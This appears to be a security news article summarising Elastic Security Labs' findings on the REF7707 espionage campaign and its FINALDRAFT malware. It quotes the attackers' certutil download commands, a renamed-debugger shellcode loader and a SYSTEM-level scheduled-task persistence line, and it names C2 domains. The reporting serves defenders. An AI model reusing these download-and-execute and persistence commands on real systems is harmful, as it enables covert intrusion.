A sophisticated hacking campaign, known as “REF7707,” has recently come to light, thanks to the diligent efforts of Elastic Security Labs. This campaign has been targeting both Windows and Linux systems with an array of novel malware families, including FINALDRAFT, GUIDLOADER, and PATHLOADER. What sets REF7707 apart is not only its advanced tactics but also its notable lapses in operational security, which have inadvertently exposed additional adversary-owned infrastructure.
The origins of the REF7707 campaign trace back to late November 2024, when Elastic Security Labs detected a cluster of endpoint behavioral alerts emanating from the Foreign Ministry of a South American nation. This initial observation sparked a comprehensive investigation, revealing a sprawling campaign characterized by sophisticated targeting and a well-established operational cadence.
Despite demonstrating high technical competence in certain aspects, the attackers exhibited tactical oversights that led to the exposure of pre-production malware samples and critical infrastructure.
Execution Flow
The execution chain of this campaign commenced with the use of Microsoft’s certutil application to download files from a remote server. The commands utilized included:
certutil -urlcache -split -f https://[redacted]/fontdrvhost.exe C:ProgramData
certutil -urlcache -split -f https://[redacted]/fontdrvhost.rar C:ProgramDataThese files were subsequently downloaded via Windows Remote Management’s Remote Shell plugin (WinrsHost.exe), suggesting that the attackers possessed valid network credentials for lateral movement within the targeted environment.
At the heart of the REF7707 intrusion set lies FINALDRAFT, a crucial component that boasts both Windows and Linux variants. This malware employs an uncommon tactic known as LOLBin (Living Off The Land Binary) by exploiting the Windows-signed debugger CDB.exe, which has been renamed to fontdrvhost.exe. This binary executes malicious shellcode delivered through a weaponized config.ini file.
C:ProgramDatafontdrvhost.exe -cf C:ProgramDataconfig.ini -o C:ProgramDataFINALDRAFT is designed to inject shellcode into processes such as mspaint.exe or conhost.exe when no specific target parameter is provided. To ensure persistence, the malware employs a Scheduled Task that invokes fontdrvhost.exe every minute with SYSTEM privileges:
schtasks /create /RL HIGHEST /F /tn "MicrosoftWindowsAppIDEPolicyManager" /tr "C:ProgramDatafontdrvhost.exe -cf C:ProgramDataconfig.ini -o C:ProgramData" /sc MINUTE /mo 1 /RU SYSTEMFor command and control, FINALDRAFT utilizes Microsoft’s Graph API, cleverly blending in with legitimate organizational traffic to evade detection by network-based security measures.
The campaign significantly relies on cloud and third-party services for its command and control operations. Domains such as support.vmphere[.]com and update.hobiter[.]com have been identified within the malware samples, forming part of the adversary-owned infrastructure. The REF7707 campaign exemplifies the attackers’ ability to leverage novel malware and exploit legitimate tools to remain undetected.
The cross-platform nature of FINALDRAFT, affecting both Windows and Linux systems, underscores the pressing need for robust security measures that can effectively address vulnerabilities across diverse operating environments.
Investigate Real-World Malicious Links & Phishing Attacks With Threat Intelligence Lookup - Try for Free
